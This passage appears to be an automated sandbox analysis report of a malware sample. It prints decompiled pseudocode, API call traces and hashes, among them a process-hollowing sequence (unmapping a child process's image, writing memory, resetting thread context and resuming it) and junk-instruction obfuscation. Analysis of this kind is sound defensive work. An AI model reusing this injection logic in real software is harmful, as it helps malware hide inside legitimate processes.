				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}












            0x0040196d
            0x0040196d
            0x0040196d
            0x00401970
            0x00401971
            0x00401973
            0x00401978
            0x00401986
            0x0040198c
            0x00401994
            0x00401999
            0x004019a1
            0x004019af
            0x004019b4
            0x004019b6
            0x004019b8
            0x004019bb
            0x004019be
            0x004019bf
            0x004019c0
            0x004019c0
            0x004019c9
            0x004019e8
            0x004019f9

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID: j\Y
            • API String ID: 417527130-662177190
            • Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
            • Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 44%
            			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}



















            0x00401973
            0x00401978
            0x00401986
            0x0040198c
            0x00401994
            0x00401999
            0x004019a1
            0x004019af
            0x004019b4
            0x004019b6
            0x004019b8
            0x004019bb
            0x004019be
            0x004019bf
            0x004019c0
            0x004019c0
            0x004019c9
            0x004019e8
            0x004019f9

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID:
            • API String ID: 417527130-0
            • Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
            • Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            APIs
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessTerminate
            • String ID:
            • API String ID: 560597551-0
            • Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
            • Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID: (3_\
            • API String ID: 0-1024548672
            • Opcode ID: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
            • Instruction ID: 64c156a0781b3c67ba192cd992c8aad639144a23081a5c252ffbc859459b19b0
            • Opcode Fuzzy Hash: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
            • Instruction Fuzzy Hash: 60113B7911520D6FE33C8A6995A00C2B796FF85608BA1284DD3818FE03C932B493CB80
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
            • Instruction ID: 5be507c2b17a54e2dc63a842639e1fc389e25062d97b9bda01936e9eba1e708e
            • Opcode Fuzzy Hash: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
            • Instruction Fuzzy Hash: 0031CE299444499ECB2D4BB0944A1D1BBA0DF5A304BA90DCBCB91BFCD7C974B483C793
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 16%
            			E00402AB3(void* __eax, signed int __ebx, void* __fp0) {
				signed int _t54;
				signed char _t65;
				void* _t66;
				void* _t70;
				void* _t71;
				void* _t73;
				signed int _t76;
				void* _t80;
				signed int _t82;
				signed int _t84;
				short _t85;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t96;
				void* _t98;
				signed int _t105;
				void* _t107;
				signed int _t117;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t131;
				signed int _t135;
				void* _t146;
				void* _t154;

				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t120 = 0xfeccffcc;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("lodsd");
				asm("int3");
				asm("int3");
				asm("movsd");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t88 = 0x20;
				asm("repne int3");
				 *(_t126 + 0x49333330) =  *(_t126 + 0x49333330) ^ 0xb9339adb;
				asm("sbb eax, 0x67cccccd");
				_t82 = __ebx |  *0xffcca0cc - 0x00000001;
				asm("daa");
				 *0xa9cca4cc =  *0xa9cca4cc - 0xffffffffb9339ada;
				_t154 = __fp0 -  *((intOrPtr*)(_t82 + 0x78));
				asm("stosd");
				asm("cmc");
				asm("int3");
				_t110 = 0xffffffffa9cca4cc;
				asm("enter 0x4fe8, 0x8");
				asm("enter 0xc927, 0xfe");
				_t105 = 0xffffffff88220080 *  *0xa9cca4cc >> 0x20;
				_t54 = 0xb9339adb *  *0xa9cca4cc;
				_t84 = (_t82 &  *(_t105 + 0x27)) >> 0xd7;
				_push(0xa9cca4cc);
				if(_t84 == 0) {
					asm("int3");
					asm("int3");
					asm("int3");
					asm("daa");
					_pop(_t131);
					_t105 = _t54 *  *(_t84 + 0x24b53927) >> 0x20;
					_t76 = _t54 *  *(_t84 + 0x24b53927);
					asm("scasb");
					_t125 = 0xfeccffcc -  *_t84;
					_t126 = _t131 ^ _t84;
					_t144 = _t126;
					asm("sidt [edi+0x680e5429]");
					if(_t126 > 0) {
						 *_t76 =  *_t76 + _t76;
						_pop(_t80);
						_t76 = E004012AB(_t80, _t84, 0x9a, _t105, 0xffffffffa9cca4cc, _t125, _t144);
						asm("invalid");
						asm("int3");
						asm("int3");
						asm("pushfd");
						_t110 = 0xffffffffa9cca4cb ^  *0x310424BB;
					}
					_t120 = _t125 ^  *_t84;
					_t88 = 0x3104241f;
					asm("int 0xcc");
				}
				asm("int3");
				asm("int3");
				_t89 = _t88 + 1;
				_t90 = _t89 - 1;
				asm("invalid");
				asm("int3");
				asm("int3");
				asm("std");
				asm("int 0xcc");
				asm("int3");
				_t93 = _t90 + 1;
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				asm("salc");
				asm("int 0xcc");
				asm("int3");
				_t95 = _t93 - 1 + 1;
				_pop(_t135);
				asm("cld");
				asm("int3");
				asm("int3");
				asm("pushfd");
				_t117 = ((_t110 - 0x00000001 ^  *(_t89 + 0x317d243c) ^  *(_t90 + 0x3e132430)) - 0x00000001 ^  *(_t93 + 0x31462438)) - 0x00000001 ^  *(_t95 + 0x31bf2434);
				_t124 = _t120 ^  *_t84 ^  *_t84 ^  *_t84 ^  *_t84;
				_t96 = _t95 - 1;
				asm("iretd");
				asm("int 0xcc");
				asm("int3");
				asm("daa");
				asm("fisubr word [0xbaa4bd16]");
				asm("out 0xcc, eax");
				asm("int3");
				_t118 = _t117 + 1;
				asm("enter 0x4fe8, 0x8");
				asm("enter 0xc927, 0xb2");
				 *(_t117 + 1) =  *(_t117 + 1) ^ _t135;
				asm("in al, dx");
				asm("movsb");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("daa");
				_t128 = _t124;
				asm("sbb eax, 0xe23827fb");
				_t65 = _t126 & 0x00000057;
				_t107 = (_t105 &  *(_t96 - 0x7af53ed9)) -  *_t84;
				_t129 = _t128 ^ _t84;
				_t85 =  *0x68ecd704;
				_t146 = _t96 -  *((intOrPtr*)(_t65 + _t65));
				 *((intOrPtr*)(_t65 - 0x15)) =  *((intOrPtr*)(_t65 - 0x15)) + _t85;
				_t66 = _t65 + 0xf4eb2485;
				asm("in al, dx");
				E004012AB(_t66, _t85, 0xab, _t107, _t118, _t124, _t146);
				_push( *((intOrPtr*)(_t129 - 4)));
				L004019FC(_t107, _t118, _t124, _t146); // executed
				_push(_t85 + 0x3098);
				_push( *((intOrPtr*)(_t129 - 4)));
				_t70 = E00402601(_t107, _t146); // executed
				_t147 = _t70;
				if(_t70 != 0) {
					_t71 = E00401F45(_t85, _t107, _t118, _t124, _t147,  *((intOrPtr*)(_t129 - 4)));
					_t148 = _t71;
					if(_t71 != 0) {
						L18:
						_t152 = gs;
						if(gs != 0) {
							_t73 = _t85 + 0x537c;
							_t98 = 0x2e0e;
						} else {
							_t73 = _t85 + 0x30d8;
							_t98 = 0x22a4;
						}
						E00401962(_t98, _t154,  *((intOrPtr*)(_t129 - 4)), _t73, _t98,  *((intOrPtr*)(_t85 + 0x818a))); // executed
						_t70 = E004012AB(0x2c3a, _t85, 0xab, _t107, _t118, _t124, _t152);
					} else {
						_push( *((intOrPtr*)(_t129 - 4)));
						_t70 = L00402269(_t85, _t118, _t124, _t148); // executed
						_t149 = _t70;
						if(_t70 != 0) {
							_push( *((intOrPtr*)(_t129 - 4)));
							_t70 = L00402339(_t85, _t107, _t118, _t124, _t149); // executed
							_t150 = _t70;
							if(_t70 != 0) {
								_push( *((intOrPtr*)(_t129 - 4)));
								_t70 = E00402000(_t85, _t118, _t124, _t150, _t154); // executed
								if(_t70 != 0) {
									goto L18;
								}
							}
						}
					}
				}
				return _t70;
			}

































            0x00402ab8
            0x00402abe
            0x00402ac1
            0x00402ac2
            0x00402ac8
            0x00402ac9
            0x00402ace
            0x00402acf
            0x00402ad0
            0x00402ad1
            0x00402ad2
            0x00402ad3
            0x00402ad4
            0x00402ad5
            0x00402ad6
            0x00402ade
            0x00402adf
            0x00402ae0
            0x00402ae5
            0x00402ae6
            0x00402aec
            0x00402af2
            0x00402af5
            0x00402af6
            0x00402af7
            0x00402af8
            0x00402af9
            0x00402afc
            0x00402aff
            0x00402b06
            0x00402b10
            0x00402b16
            0x00402b18
            0x00402b19
            0x00402b1b
            0x00402b1e
            0x00402b1f
            0x00402b25
            0x00402b26
            0x00402b27
            0x00402b2b
            0x00402b2f
            0x00402b2f
            0x00402b34
            0x00402b37
            0x00402b38
            0x00402b3a
            0x00402b3b
            0x00402b3c
            0x00402b3d
            0x00402b3e
            0x00402b3f
            0x00402b3f
            0x00402b45
            0x00402b46
            0x00402b48
            0x00402b48
            0x00402b4a
            0x00402b51
            0x00402b53
            0x00402b55
            0x00402b71
            0x00402b78
            0x00402b7a
            0x00402b7b
            0x00402b7c
            0x00402b7d
            0x00402b7d
            0x00402b83
            0x00402b85
            0x00402b8a
            0x00402b8a
            0x00402b8b
            0x00402b8c
            0x00402b8d
            0x00402b9c
            0x00402ba0
            0x00402ba2
            0x00402ba3
            0x00402bb0
            0x00402bb1
            0x00402bb3
            0x00402bb4
            0x00402bb7
            0x00402bb8
            0x00402bb9
            0x00402bba
            0x00402bc7
            0x00402bc8
            0x00402bca
            0x00402bcb
            0x00402bcd
            0x00402bce
            0x00402bcf
            0x00402bd0
            0x00402bd1
            0x00402bd2
            0x00402bd8
            0x00402bda
            0x00402bde
            0x00402bdf
            0x00402be1
            0x00402be2
            0x00402be3
            0x00402be9
            0x00402beb
            0x00402bec
            0x00402bed
            0x00402bf1
            0x00402bf5
            0x00402bfd
            0x00402bfe
            0x00402c00
            0x00402c01
            0x00402c02
            0x00402c04
            0x00402c05
            0x00402c06
            0x00402c0b
            0x00402c0d
            0x00402c0f
            0x00402c11
            0x00402c18
            0x00402c1b
            0x00402c1e
            0x00402c23
            0x00402c35
            0x00402c3a
            0x00402c3d
            0x00402c48
            0x00402c49
            0x00402c4c
            0x00402c51
            0x00402c53
            0x00402c5c
            0x00402c61
            0x00402c63
            0x00402c89
            0x00402c8c
            0x00402c8f
            0x00402c9e
            0x00402ca4
            0x00402c91
            0x00402c91
            0x00402c97
            0x00402c97
            0x00402cb4
            0x00402ce0
            0x00402c65
            0x00402c65
            0x00402c68
            0x00402c6d
            0x00402c6f
            0x00402c71
            0x00402c74
            0x00402c79
            0x00402c7b
            0x00402c7d
            0x00402c80
            0x00402c87
            0x00000000
            0x00000000
            0x00402c87
            0x00402c7b
            0x00402c6f
            0x00402c63
            0x00402ce6

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
            • Instruction ID: ee94f92266ba9be288bfed2233454c816de7546f4ab939652c09e43866b9b785
            • Opcode Fuzzy Hash: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
            • Instruction Fuzzy Hash: 63317A2991085D9BCB2D4B75905C191B7A4DF5E308FB60D8ACB91BFD97CA34B843C293
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
            • Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000001.286880592.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
            • Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
            • Instruction ID: 0d435e3da4236d765e4c301cf304dd2dd2fe2570b998ddab2789a7de4284b15f
            • Opcode Fuzzy Hash: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
            • Instruction Fuzzy Hash: 1001A27800265CAB972DCAA5D5D9041FFA9EE06330FA8EC8DC7824FD42CEB57086C643
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
            • Instruction ID: 7ec0170f8d63d1cb41ea52610257a3a2e440b84d0ce0a50aa0c143b35ceb2a17
            • Opcode Fuzzy Hash: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
            • Instruction Fuzzy Hash: 26F0C87410020D6ED22CD7A0D185052B7A4FFC1304F611D5DC3422BCA2C939B853DA83
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
            • Instruction ID: a43892d0f1fc751e2312f163d4b39de440685b5976e97a52a0fb587587c89ddc
            • Opcode Fuzzy Hash: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
            • Instruction Fuzzy Hash: 32F0AF7400424D6E93299B719585092BBA4FF82304F611D8EC3825BC62CA3AB893CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
            • Instruction ID: d517fed31536b1fc2a21567abd7de147b63b6840b6cf7dc9692091a0263e9a5e
            • Opcode Fuzzy Hash: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
            • Instruction Fuzzy Hash: D4F0C27410421DAE926CDBA0D185092BBA4FFD2304F615D5DC3426BCA2CA3AF853DA82
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
            • Instruction ID: b234b1e164d4dd428b17fdfb9b1103a254be6e4ce54d4f1e89fdf23064b212e5
            • Opcode Fuzzy Hash: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
            • Instruction Fuzzy Hash: 15E0C26910150E6E865C8A7195440D2B7D6FFC2240BA12D49C3062BC22893AB883D591
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: iaivaah PID: 6324 Parent PID: 664 iaivaahCOMMON

            Executed Functions

            Download Yara Rule
            APIs
            • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 03280156
            • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0328016C
            • CreateProcessA.KERNELBASE(?,00000000), ref: 03280255
            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03280270
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 03280283
            • GetThreadContext.KERNELBASE(00000000,?), ref: 0328029F
            • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 032802C8
            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 032802E3
            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 03280304
            • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0328032A
            • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 03280399
            • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 032803BF
            • SetThreadContext.KERNELBASE(00000000,?), ref: 032803E1
            • ResumeThread.KERNELBASE(00000000), ref: 032803ED
            • ExitProcess.KERNEL32(00000000), ref: 03280412
            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
            • String ID:
            • API String ID: 2875986403-0
            • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction ID: ab3a006549da9ace42b61747749d6a9a235efd5f309f4dd47ef2a0ae302ef331
            • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction Fuzzy Hash: 57B1C774A00209AFDB44CF98C895F9EBBB5FF88314F248158E508AB391D771AD85CF94
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            APIs
            • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 03280533
            Strings
            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
            • API String ID: 716092398-2341455598
            • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction ID: ff99fc012b356ec5fb62cb409ebaf164c2931f03fe3ac8a675d413011039eb53
            • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction Fuzzy Hash: CF510970D09388EAEB11DB98C849BDDBFB6AF11708F148098D5447F2C6C3FA5658CB66
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            APIs
            • GetFileAttributesA.KERNELBASE(apfHQ), ref: 032805EC
            Strings
            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID: AttributesFile
            • String ID: apfHQ$o
            • API String ID: 3188754299-2999369273
            • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction ID: 849ab9c255b6addc225baeeea7e161a965a5ecbd113242ee9b6171db2eb8de48
            • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction Fuzzy Hash: 83011270C0525DFADB10DF94C5183ADBFB5AF41308F188099C4052B281D7B69B98CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Download Yara Rule
            Memory Dump Source
            • Source File: 00000011.00000002.393732484.0000000003280000.00000040.00000001.sdmp, Offset: 03280000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction ID: 301da2c8975384037121ce8d50e26aa01bd2731ee61c5c5084386f1ce95718e8
            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction Fuzzy Hash: 4811A572351100AFE754DF65DCD1FA673EAFB88220B198155ED08CB351D676EC45C760
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: iaivaah PID: 6600 Parent PID: 6324 iaivaahCOMMON

            Executed Functions

            Download Yara Rule
            C-Code - Quality: 46%
            			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}












            0x0040196d
            0x0040196d
            0x0040196d
            0x00401970
            0x00401971
            0x00401973
            0x00401978
            0x00401986
            0x0040198c
            0x00401994
            0x00401999
            0x004019a1
            0x004019af
            0x004019b4
            0x004019b6
            0x004019b8
            0x004019bb
            0x004019be
            0x004019bf
            0x004019c0
            0x004019c0
            0x004019c9
            0x004019e8
            0x004019f9

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Strings
            Memory Dump Source
            • Source File: 00000015.00000002.405212543.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID: j\Y
            • API String ID: 417527130-662177190
            • Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
            • Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A
            Uniqueness

            Uniqueness Score: -1.00%

            Download Yara Rule
            C-Code - Quality: 44%
            			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}



















            0x00401973
            0x00401978
            0x00401986
            0x0040198c
            0x00401994
            0x00401999
            0x004019a1
            0x004019af
            0x004019b4
